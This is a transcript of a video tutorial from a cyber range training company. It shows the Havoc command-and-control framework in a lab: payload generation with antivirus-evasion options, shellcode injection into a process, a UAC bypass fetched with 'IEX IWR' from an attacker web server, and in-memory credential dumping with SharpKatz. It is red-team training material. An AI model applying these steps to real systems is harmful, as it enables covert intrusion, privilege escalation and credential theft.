Red Teaming With Havoc C2

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hello everyone and welcome back to the Cyber Rangers Youtube channel in this video we're going to be uh continuing off in our C2 framework playlist or Series where we'll be essentially taking a look at uh how to utilize the Havoc C2 framework for red teaming operations now uh before we get started as you already know there's a couple of videos within this series so if you're new to the series make sure to take a look at our C2 framework series here on YouTube uh that will essentially introduce you to C2 Frameworks explain how they work as well as give you examples of uh some of the other C2 Frameworks we've taken a look at uh on another note we will be running a C2 Frameworks boot camp on the 25th of October 2023 if you want to register for that bootcamp to learn more about C2 Frameworks uh please take a look at the link in the description for more details on how to get access with that being said uh let's get started so Havoc C2 or the Havoc C2 framework is a relatively new C2 framework uh when you know you compare it to some of the other options available uh especially the open-source options available so you might be asking yourself if you haven't heard of Havoc what exactly is Havoc apart from the fact that it is a C2 framework well to dive a little bit deeper Havoc is a modern and malleable post exploitation command and control framework created by CS spider or C5 spider depending on how you want to call it and it's important to note that uh Havoc is still in an early state of release or development and what that means is that changes and updates made to the framework may change how the framework works or may break functionality the reason this is important going back to some of the the previous videos within this series is primarily because when you are choosing a C2 framework uh one of the parameters that you should have or that you might have is the fact that it remains uh relatively stable or uh remains relatively the same in terms of functionality over a period of time so as to ensure continuity for your red team operations uh but with that being said you can actually find or learn more about the framework and the development road map on the GitHub reposit and it's also recommended to refer to the official wiki for more information on functionality and the components that make up the framework so they have a lot of info on there now in this case we'll be utilizing a lab on Cyber ranges uh the lab will be part of the C2 Frameworks playlist that you can actually subscribe to uh you can get access to this playlist of labs through our upcoming C2 Frameworks boot camp but I'll be walking you through that process shortly so to dive a a little bit deeper into the release history uh as I pointed out Havoc is still in active development and as a result it has not yet been adopted by adversaries for long-term engagements and so far Havoc uh has only two major releases so we have 0.1 code named star Platinum that was the first public release of havoc and we have 0.2 called or code named magicians red which is the second public release of Havoc so given the Project's development cycle and road map app it is very important to consider your own C2 requirements and how they can play into the overall stability of Havoc at this point in time so given the relative uh newness of Havoc many AV Solutions like Windows Defender have not been able to detect the vanilla payloads or stages now of course this may change depending on when you watch this video but this is very common for new C2 Frameworks that de uh that develop new or that compile new implants or agents uh if they are utilizing new techniques or techniques in different ways in terms of generating the payloads uh those payloads will in most cases evade detection until uh you know the actual um antivirus Solutions or edrs update their signature database um so in late October 2022 a lot of Av and EDR Solutions began developing signatures to detect the Havoc payloads but they can still be utilized in a plethora of other ways like for examp for example injecting the payloads into an executable uh know so on and so forth in terms of the options you have for payload uh generation we'll actually get uh take a look at that but before we do that uh installing and building hav can be quite uh cumbersome uh or complicated at this point in time but it does work well on debn 10 11 Ubuntu 20.04 22.041 python 3.10 uh upwards to avoid build issues so to alleviate some of these issues what we have done on Cyber ranges is build a lab that already has Havoc installed or configured so you don't have to go through that process and can essentially dive into it so Havoc is uh another thing to not is that Havoc is not yet a part of any official repository of penetration testing distributions like Cal or parrot so you can't install it directly via a uh you know via a package within the one of the repos uh the Havoc project is also actively working on a functional Docker image that will simplify the setup and build of uh various components that make up the framework so in time we will see a Docker image available that can again speed up the setup process now in terms of its features uh you know given the fact that the framework is relatively new uh the features are limited but I would argue that they are very very useful in the context of Windows redeeming so firstly terms of payload generation you're limited to exe Shell Code and dlls which is perfectly fine in the case of Windows you also have HTTP and https listeners you have customizable C2 Frameworks and external C2 framework support uh one really cool features you have sleep obfuscation via Echo foliage uh which I'll touch on you also have x64 return address spoofing indirect CIS calls for uh Windows NT apis SMB support uh for more p uh peer-to-peer style uh C2 um Frameworks or architecture you also have token Vault and a variety of built-in post exploitation commands as well as the ability to execute po Shell Code in memory which is actually fantastic and the same goes for Shell Code so we'll take a look at all of this and in my opinion the user interface of Havoc or the Havoc client is very similar to that of something like Cobalt strike which I personally like so you know this is a great framework to actually get uh you know to actually try out if you are looking for something along those lines in the context of Windows red teaming uh now for some important terminology because as you know every C2 framework has their own unique terminology which again is nothing new but it's very important that you understand what these terms mean so you know generally speaking globally speaking The Listener is a a fairly well-known piece of terminology in the context of C2 Frameworks it essentially you know refers to the local process listening for a connection or Beacon from a compromised host now we then have the term team server the team server refers to the actual Havoc C2 server and then you have the Havoc client and the client is what you utilize to interact and communicate with a team server what this means is that Havoc also supports multi-user support which means if you are part of a large red team you can all utilize the client to connect to a centralized server and then execute operations that way you also have modules so modules are a piece of code executed by the agent agent to achieve a specific goal you also have the demon this is very important the demon is the primary Havoc agent and it's written in C uh ASM and you also have the demon payload and currently at this point in time as I've already gone over the only supported payload uh demon payloads are x64 exe's dlls as well as Shell Code so it's really a Windows C2 framework at this point in time functionality may be extended and that's why it's very important that you actually try it out before a op in it for a red team engagement as for the listener types you have your standard HTTP https listeners so they used to issue tasks through get requests and uh can receive data back with post requests you also have an SMB listener which are used to create peer-to-peer communication um C2 communication channels that utilize named pipes to communicate through a parent agent you also have external C2 listeners so they support custom agents and external C2 by utilizing the team server service endpoints um in terms of the modules and you might be thinking to yourself well how extensible is this C2 framework well at this point in time Havoc has a couple of officially supported and integrated modules one of which is power pick which executes unmanaged partial commands by loading the CLR runtime into the designated fork and run process which is very useful you also have invoke assembly this will execute a net assembly into a separate process by bootstrapping the CLR into the designated fork and uh process and the Run process and passing the arguments you can learn more about these supported payloads uh on their GitHub repository in the context of Windows red teing you're really going to be working with pow shell which Havoc has fantastic support for so I'm really excited to get started so now that we can actually get started with the demo I'm going to switch over to the Cyber ranges platform and uh we can actually you know take a look at how to utilize the C2 Havoc C2 framework for red team operations so let me switch over into my browser real quick all right so I am back within my browser and I'm currently on the Cyber Rangers platform to access the lab there's two ways you can go about doing it you can either buy a subscription to the lab or to the playlist of labs titled C2 Frameworks or alternatively an easy way to get started with it uh at a relatively cheap price is the upcoming C2 Frameworks boot camp uh scheduled for the 25th of October again the uh link to that event is in the description section but to get started if you're new to cyber ranges uh you can essentially navigate to the URL app. cyber rangers.com where you'll be prompted to create an account uh if you have an account that's great if not registering for one is easy and is free so you can click on register right over here you'll then need to provide a unique username and a functional or valid email because you will receive a um you will receive an activ ation email that will ask you to confirm you know your account and consequently specify your password so once you provide a valid email and confirm it uh you can go through the terms and conditions and then agree to that if you do agree with the terms and conditions and then register you don't need to put in a promo code at all here that's not required and once you've registered you'll receive that activation email that will provide you with a link to which uh or through which you can specify your password for your account and you should be good to go so I already have an account so I'm just going to log in here and uh if you'll see once you'll be logged in you'll be taken or directed directly to the Cyber Rangers dashboard uh where you know you can essentially view the latest uh scenarios or labs in the context of the Cyber ranges platform scenarios are individual labs and playlists are collection of labs so you can go through the playlists and scenarios available on Cyber ranges uh currently the community section is where you can find free Labs so we have a great selection of free Labs that you can get get started with at no cost so they essentially come pre-bundled with your account as free so you have unlimited access to them we have a m attack defend adverse ulation fundamentals playlist which contains seven Labs here really cool stuff you also have a collection of 72 boot to root scenarios so these are CTF challenges that you can go through uh you also have a collection of vulnerable web applications as well as cve Labs uh we have some really cool vulnerabilities in here like log four shell dirty pipe and the latest uh vulnerability on Linux cve 2023 22809 which is the pseudo edit privilege escalation lab now to get access to the C2 Frameworks playlist of labs you can navigate into playlists and just uh search for C2 and it should pop up here so you can get access to this lab at $150 per month which will provide you with access to Labs on uh a range of C2 Frameworks like Empire Covenant Havoc sliver DNS cat as well as Mythic as well as a range of other ones like Nimbo Atlas porsch C2 as I said earlier if you want to get uh really um if you want to access these labs for a month in addition to the boot camp please take a look at the link in the description so in my case I already have the Havoc lab started up and uh the link to the playlist will be in the description section as well so I'll just go into Havoc here and this is what a lab looks like on Cyber ranges so uh the labs are sorted or the lab page is very easy to understand you have an overview that will provide you with a walkthrough of the lab and the systems that you can access within the lab so uh cyber Rangers Labs provide you with access to a Cali Linux system so you'll have access to that in addition to that you can also connect to the network to the lab network using a VPN if you want to utilize your own pen testing drro and you have details on the target system as long as well as credentials uh that you can utilize there so the overview provides you with a walkth through you also have questions that'll assess your uh your knowledge and abilities with regards to the Havoc C2 framework so this is very important and they're sorted based on configuration as well as the the red team operation side of things here and you then have the service page where you'll be uh essentially provided with a list of systems you can access as part of the lab so as I said you have access to the Cali Linux system you can just click on remote desktop and it'll open up a session within a new browser tab that you can see here so because we have two systems via Apache guacamole I'll just click on Cali and you'll have near native performance with the Cal Linux system directly in your browser how cool is that so there we are we can see we're on the C Linux system and we can now get started with Havoc so you can go through the video demo that I'll be walking you through or you can go through the scenario Mission or walk through if you find that works better all right so to get started with Havoc as I said the lab is already already configured or already has Havoc uh built and configured so you we don't need to go through that phase so just open up a terminal here and I'm just going to increase the font size so you can see what I'm doing we want to navigate into the opt folder so let me do that right now and uh we then have the Havoc folder in here so we're going to go into havoc and from this point on let me explain how Havoc is sorted in terms of the file structure so you can see we have a couple of folders We have uh most importantly the client folder and the team server folder uh we also have a couple of other important ones so to begin with uh what I want to explore is the profiles um the the profiles folder within the team server folder so I'm going to navigate into team server uh right over here and um within the team server we're going to have a couple of binaries or a couple of uh yeah pretty much binary so we have the team server binary which you can execute using pseudo team server and you can then bring up The Help menu to get some uh information about how to utilize or how to start up the team server I'll be walking you through this the reason this is important is because the team server requires a profile a C2 framework profile to be specified so if we navigate into the profiles page you can see that we're going to have uh two profiles we're going to have the Havoc uh yotel profile so they're in a yotel format and the HTTP SM SMB profile which is uh the one that's been set up so this will set up uh HTTP and SMB listeners for you so these ones are there by default so if I cut out the contents you can see pretty much defines parameters around the functionality of the C2 uh server or the team server so you can see that the host is set to the the actual uh IP of the calck system and the port it listen on is 4,056 the compiler is the standard one so compiler x64 as well as the nzm compiler here for generation of payloads and then the operator credentials or profiles are listed in here so let me just expand that again uh there we go and you can see that the users you can utilize are spider and Neo and the passwords are displayed here you also have information about the listeners so the HTTP listen has been configured to bind to the IP address of the cinic system so we don't need to modify anything there you can also take a look at the user agent for that and you then have the the actual SMB listener here which um is just called pivot SMB and the pipe name for SMB is demon pipe for the injection you can see uh the default uh parameters are specified here for spawn 64 spawn 32 and uh the default sleep um sleep option has been configured to 2 seconds so you can modify the profiles to affect how Havoc will work and in terms of utilizing it or starting up the actual Havoc C2 or team server it really is very very simple so what we need to do at this point is just uh you know say pseudo team server so we run the team server module or binary if you will and then we specify the option server and then we need to specify the profile so the profile in this case is under the profiles folder as I showed you and the name is just HTTP SM SMB doal and we hit enter that's going to take a couple of seconds so you can see Havoc framework version two magicians red the profile being used is http mb. yotel the build options everything that we saw in the profile and then it's going to start the listeners and from this point on we can now utilize the Havoc GUI client to interact with the team server so I'm going to open up a new tab here and we'll just navigate to the same folder so I'll just zoom in once more and we'll go into CD opt and Havoc right over here and in here we want to go into the client like so and within the client we have the Havoc client bin so to run it or to get started we just say Havoc or execute the minary and from this point on it's going to bring up the connection prompt the GUI connection prompt and what we want to do is click on new profile and the name for the profile will be set up it's going to connect to Local Host which is fine that's where we have the team server running and make sure you leave the team server tab open within your terminal because that is required and uh from this point on if you remember the credentials for the user spider uh those are going to be password 1 2 3 4 and you can then connect and that's going to bring up the Havoc C2 guy client which is absolutely fantastic and uh reminiscent of cobalt strike so now I'm going to walk you through the user interface and then we can take a look uh at an example of how you you would utilize Havoc C2 for a Windows red team operation or a red team operation that's uh targeting Windows environments so to kick things off at the top you're going to have a toolbar that's very important so if you click on Havoc you have the ability to create a new client session or disconnect from the current section uh or exit under view you'll be able to take a uh you'll be able to view your current listeners so if I click on listeners you can see we have the two listeners configured in the ortal profile so you can see we have the HTTP https listener where you can uh pretty much remove it add a new one or edit it so if we click on edit you can see the agent uh it's called Agent list HT TP uh or https and the payload is HTTP it's currently configured to bind to the IP address of the C Linux system and the port it connects uh to is 443 you can play around with the user agent as I know that's usually useful as well as the headers so obviously try and get rid of X Havoc headers right over here or modify them so that uh when uh you know if your traffic is being uh monitored or analyzed you know it doesn't look too obvious you can also configure proxy connection if that works for you but that's how to view your listeners as well as remove them or edit them or add a new one if we take a look at the SMB uh listener very very simple you just provide the pipe name right over here that's very useful for uh Windows environments especially where when you want to set up a peer-to-peer based C2 uh connection uh connection architecture or style so now that we've taken a look at listeners on The View you can also change the set view from a table to a graph which is really cool I'll actually get to that uh part of the multi-user support provides you with access to a team Server chat where you can communicate with your other uh red team operators so for example my username is spider here and I can say hello and if we had other clients they would be able to communicate with me so I really like this feature because it's integrated into the client and multi-user support is always fantastic you can also close active tabs at the bottom here so the panes are sorted to essentially by default provide you with an Event Viewer as well as a list of um agents so the agents table has you the ID uh the internal IP the username the computer the operating system the process the process ID the architecture of the process and when the uh the agent um essentially last connected back or L sent a beacon back so on view I can also take a look at loot so that that's information that's exfiltrated from a host or a Target as well as the Event Viewer and the team server and you can see the team server just shows you the current state of the Havoc C2 server uh you know where you can essentially use this to diagnose any potential issues on that front under attack you have the ability to generate a payload which will get into and then you have the scripts where you can take a look at the script console as well as the script manager right over here where you can load scripts in uh most likely partial scripts of course and then uh the help provides you with documentation the API reference as well as a link to the GitHub repo so now that we have an understanding of the overall UI let's get started with an example as to how we can use Havoc for a red team operation all right so in order to gain access what we're going to be trying to do is generate a payload or a demon if you will and then transfer it over to our Target Windows system we're not going to be utilizing any real red team uh techniques or tactics or techniques for initial access we'll just be transferring the payload with a uh with a web server switching over to the Windows machine downloading it and then executing it but uh to generate the payload we want to click on attack and payload and the agent is just demon and The Listener we want to bind it to is the HTTP listener that we have configured architecture it only supports x64 at this point in time and then the formats this is where you have the exe format the dll format Shell Code Etc we'll also take a look at Shell Code later on you can then configure the sleep timer here as well as disable or enable indirect CIS calls which is great for uh defense evasion so uh with this the Agents come with an inbuilt defense evasion tactics or techniques like the ability to utilize indirect CIS calls to avoid calling functions from you know kernel 32.dll and ntdll.dll so uh it also has the ability to utilize two techniques to encrypting the memory region of the process that it's running in to avoid uh memory scanners when the agent is in sleep mode so an example of this uh right over here is um if I go into the Sleep Technique we have foliage and Echo right so if you're not familiar with foliage and Echo they're essentially uh they're essentially techniques that uh allow you to encrypt the memory region of the process essentially making it hard for an EDR for example to uh to actually you know Market as suspicious so we'll go with echo in this case which is very effective and then the injection technique native csol you can also you know opt for win 32 and once you're ready to go you can just click on generate and it's going to compile the windows exe payload for you uh and in this case the agent is just demon so as you can see compiling Source I'm going to give it a few seconds to maybe a minute to uh finalize all right so once it's done it's going to prompt you for a uh it's going to prompt you to provide a location as to where you want it saved I'm going to save it in my downloads folder that'll become apparent because there's a couple of scripts we have here some partial scripts as well as seat belt and sharp cats uh that will be using for this demo so I'll save it in there as demon. exe and uh now that we have that generated we now need to transfer it over to the Windows system so in order to do this I'm going to set up a um I'm going to set up a web server here using python on the Cali Linux system to host that file all those files within the downloads folder so I'll navigate into downloads and in here we'll just say pseudo Python 3 uh module is HTTP do server and we'll run it on port 8080 and it'll host all of these files that will require so now I'll switch back over to the lab page and under the Windows 10 system which is the target system we can also get uh RDP access to that system um within our browser So within guacamole we'll just click on Windows 10 and you should be signed in so this system is running Windows 10 which is great for this demo and now I'll just download the demon payload that we generated so I'll just utilize Powershell and I'll navigate uh actually let me increase the font size here so you can see this so on the font just increase this to something like 28 so I'll navigate to the desktop and from this point on I can say or I can utilize something like invoke um web request and then say you know you are I is going to be the IP address of the Cali Linux system which is going to be static so in this case is 1921 1681 125 55 and then the port is port 8080 and windows is bugging us with updates as usual um and there we are so 8080 and then the name is demon. exe as we know as we saved it as and then the out file is going to be demon. exe and we can then hit uh ENT and it's going to save it on the desktop and then from this point on we can pretty much execute it so I'm just going to say demon. exe from within Powershell and if we switch back over into the Cal Linux system and into the Havoc client uh we should see the call back from the actual agent in a few seconds so uh depending on the sleep timer uh there we are we can actually see it so uh in this pane you're going to see the actual agents being displayed you can change the view to uh a a graph which is more reminiscent of cobalt strike where you can essentially view the uh C2 server represented by this icon and all of the agents calling back all of the hosts calling back in here if I'll go back into the table view where you can see the ID of the agent its internal IP the user we currently have access to the computer name or the host name the operating system as well as the process the process ID the architecture and when it was last seen so if the Sleep ter is set to to seconds it'll ping back every 2 seconds obviously that's something you can modify so to interact with it you can right click on it and you have a couple of options so you can export it Market as dead remove or terminate the uh the connection through the thread or process option there so under interact that'll bring up an interactive shell session uh which will open up in the bottom pane right over here so I'll just drag this in here and uh there's a couple of things that you need to be aware of so firstly Havoc provides you with a really cool uh set of inbuilt modules or commands that you can invoke or you can learn more about by typing in The Help uh option and you can see that we have a couple of demon commands like uh sleep check-in job task uh directory your standard file system navigation tools as well as a poell option so for example I can run the inbuilt command who am I like so and that's going to display additional information so that's not the native Windows command if I wanted to run a shell command on the Windows system I can just say shell who am I and that'll run the actual who am I command and you can see it's going to task the demon to execute the shell command and the output will be displayed here so you can see that's what you would expect from the Native Windows command you can also learn more about a an inbuilt command by typing in help and then the name of the command like who am I and you can see it's going to say uh the usage is fairly simple this is going to get all the info from who am I all without starting cmd.exe so that's one of the great things about Havoc is defense evasion is built into it in terms of command options that you get natively so a very useful command is obviously the check-in command here so if I just type it in checkin this will allow us to view um it's going to send a check-in request uh so there we are check-in request we get information about the the agent so the agent ID the first call-in in terms of the Tim stamp as well as the cryptographic uh key in so the a key and then the Sleep delay and just information about the agent uh we can also right click on an agent here and you um navigate the uh or explore the process list or the file explorer so if we go into the process list it's going to open up a new tab and look at how fantastic this is so we have essentially a complete list of the process tree starting from process ID zero and uh so on and so forth so we can take a look at processes and interact with them by right clicking on them and copying the process ID we can also refresh the process tree right over here you as I said you also have the ability to utilize the file explorer module which as it says uh will allow you to browse the file system off the actual um on the actual agent or the target host so file explorer in here you can see we're currently within the desktop but we can specify a path for example C users in here and I'll hit enter and that's going to bring up that directory we can then navigate by going into let's say admin and um in this particular case if we hit enter I don't think that'll work directly but we can say C in here and we can just say users and admin like so um if that doesn't work you can specify the native path here as you would within windows and make sure to specify the correct folder or file names and uh if I hit enter now that'll bring up the uh the admin user directory and we can then navigate so if you want to exfiltrate a file you can right click on it and you can then uh you can also create a folder uh you can reload or remove a file but for example if we uh right click uh if we actually go into see uh let me say users and then uh let me type that in correctly so users and then we say admin in here and I go into the desktop you'll see it'll bring up the desktop and then from this point on uh we have the ability to exfiltrate and download through the shell session which I'll touch on uh but you can also remove it create a directory or reload the file system so really really cool stuff here so what we can do is if we go into the shell session we can actually you know try and for example take a screenshot of the desktop and the reason why I'm showing you this is because uh right over here you can view what uh you have exfiltrated by going into view and clicking on Loot and here you'll see the screenshot that we just took which is exactly how we left it on the Windows system with the Powershell session still running which is pretty cool you can also filter by the type of information or data exfiltrated so screenshot or downloads and uh that's a really really cool uh tip or something that I find really really useful so now let's take a look at uh you know some you know typical things you do after exploitation or initial access with Havoc so an example of something that we can do is of course run the shell system the windows uh system info command to learn more about the target so just standard local enumeration and the output will be displayed as you know within this window so here we can learn more about the target operating system we can also you know perform enumeration about the user so for example uh in here we can say you know shell net user and uh we can just say for example to learn more about the admin user we can say shell net user admin and um we'll give that a few seconds it's going to send the task and there we are so we now know that this user is uh part of the administrators the uh the local administrators group on windows so that means if I say shell who am I and I say priv here let's see whether we have elevated privileges or whether we'll need to you know bypass um UAC so in this case we can see that while the admin user is part of the local administrators group um we currently don't have a privilege session so let's take a look at that as an example as to how we can Elevate our privileges so one thing that we can do is if we go back to the process tree and I want to show you some Shell Code generation and injection um we can actually um we can actually try and inject Shell Code into a process right so in order to do that what we want to do is is uh let's go ahead and uh we're going to go into attack payload and we're going to generate Shell Code so Windows Shell Code and in here we'll again select the Sleep technique as Echo and we're going to say generate and that's going to generate Shell Code in the form of a uh binary file or bin file if you will not binary but bin and um we'll give it a couple of seconds is then going to prompt you to specify a location as to where you want to save the bin file so it's going to to compile everything and that'll take a couple of seconds which we will uh you know happily give and I'm going to save it under the downloads directory so just as demon. bin and now that it's done we can actually go into the process tree and for example uh we had created a partial process here let me see if I can identify it so uh we'll just try and find it uh somewhere here let's see hm uh can we find powershell.exe anywhere here all right so there we are we have power shell and now I can copy the process ID and if I wanted to inject that Shell Code to give us another session again just showing you how this can be useful you can generate whatever Shell Code you want and then inject it into a process dynamically we can essentially go back into the shell here and say uh shell code um so I'm just going to type that in so Shell Code inject and we can then say X6 4 because it is x64 Shell Code and then the process ID which we copied so I'll paste that in there which is 6328 of the power shell process or any process for that matter and then the directory to the Shell Code so home range admin is the name of the user on the Cali Linux system under downloads We have demon uh dobin all right so I'll hit enter and that's going to execute the Shell Code into the remote process and we should get another check-in from the same Target system now as I said you can inject whatever Shell Code you want that does whatever you want this just shows how this will work so you can see that the injection the U the Shell Code was injected successfully and indeed we get another call back from the same system but now through the poell process how cool is that now if we wanted to elevate our privileges if you remember we had set up a web Ser in the downloads directory that contained a bypass UAC partial script we can actually try and I'll show you how execute power shell scripts with Havoc here so it really is very very simple so we firstly need to get the agent to download it from our web server uh the actual script so we'll say Powershell and you can execute Powershell commands natively uh this way so we can say Powell IEX iwr and then we can say usab um and then HTTP the IP address of the cinic system where the web server is running uh 55 and then we can say port 8080 and the name of the file is going to be as we know bypass uh UAC and uh it is bypass u. PS1 so Powershell and then um we can just close the brackets and hit enter so this will tell the agent uh to essentially download the script and then execute it and we should get a call back based on what the script does which I'll actually show you so this is a modified um bypass UAC script that we develop to essentially bypass uh UAC and then connect back to our listener here so in this particular case it will bypass UAC and then execute the demon. exe payload that we transferred onto the Windows system which is why I saved it on the desktop so you can modify this script to execute whatever executable you want or payload that you want even a meterpreter payload uh as long as you specify the path uh where it is saved and you ensure that that payload is already been transferred so uh not really an intri intricate script by any means but uh we can just hit enter here and it's going to send the task to the agent and uh there we are we received an output and uh we should get a call back if everything was successful if not we'll take a look at the command to see whether we had any errors but we should get an elevated or a privileged call back which indeed we do so the best way to visualize this is to go into view and then into the graph View and in here now let me just drag this pan to the bottom and you can now see that we have two uh standard non-privileged sessions on the actual system or the host these two here running on different processes and then we have a privilege session so it has a similar iconography to that of cobalt strike where the elevated session will'll have an icon that's highlighted in red that's surrounded by electricity or uh something like that and uh in this case we now have an elevated session so we can now right click on it and interact with it and if I now say you know for example who am I uh we can just say shell because we want to run who am I uh priv we should now have elevated uh an elevated session so we'll wait for the results and as you can see here we have all the Privileges you would associate with an elevated session now the final technique that I want to show you is how we can um essentially execute uh inline um how we can utilize the net command and perform inline execution to run an executable right so in this case we'll be running sharp cats which is under the desktop of the Cali Linux system so we can utilize something called net and then inline um execute to execute the executable in line or in memory and we specify the path to that executable so in this case it's down uh home range admin downloads and the name is shop cat.exe so this executable already ex is already present in the downloads folder and will just allow us to dump credentials proving that we elevated our uh privileges so we can now say log on passwords um so we'll just say log on password so this is a modified version of mimicat we'll just hit enter and if everything is successful um let's see looks like we have a bit of an issue so net inline execute home R range admin downloads sharp cat.exe uh log on passwords um let's see do we have any error here so uh we have it on the downloads and it's just shop cat.exe um uh let's see here I think I made a spelling mistake with net that is my badge so that's not doet but rather net there we are and that should execute that exe in line or in memory so there we are we can see that Shop cats execute successfully and we should be able to get some hashes here so we'll give it a couple of seconds and uh the results will will be displayed back we actually get the ntlm hash of the admin user which you can then try and crack although the clear text password is already displayed here on the lab page so that is uh that brings us to the end of the Practical uh session of this video and to the end of the video as a whole and that is how to utilize Havoc uh C2 framework for red team operations so definitely give it a go uh and with that being said thank you very much for watching this video If you enjoyed this video please leave a like down below and subscribe to the Cyber Rangers Youtube channel for more uh if you found this video useful please share it on uh your social networks on LinkedIn and Twitter that'll help us a lot if you want to gain access to this lab and other C2 framework Labs uh please take a look at our upcoming boot camp it's a 3-day boot camp uh in on starting on the 25th of October that will provide you with access to the actual training and the C2 Frameworks playlist on Cyber Rangers for days are all at an incredibly uh cheap price so definitely check that out the link to that is in the description section with that being said thank you very much for watching and I'll be seeing you in the next video

Info

Channel: CYBER RANGES

Views: 10,581

Rating: undefined out of 5

Keywords: cyber security, cybersecurity, cyber range, cyber ranges, cyberranges, havoc c2, havoc, havoc c2 framework, havoc c2 framework overview, c2 frameworks github, best c2 frameworks 2023, best c2 frameworks, programming, mythic c2 framework, c2 framework revealed, introduction to c2, introduction to C2 frameworks, penetration testing, c2, command and control, c2 framework functionality, red teaming cyber security, red teaming course, red teaming vs pentesting, red team, pentesting

Id: WGJbI_Hug_I

Channel Id: undefined

Length: 43min 18sec (2598 seconds)

Published: Wed Oct 11 2023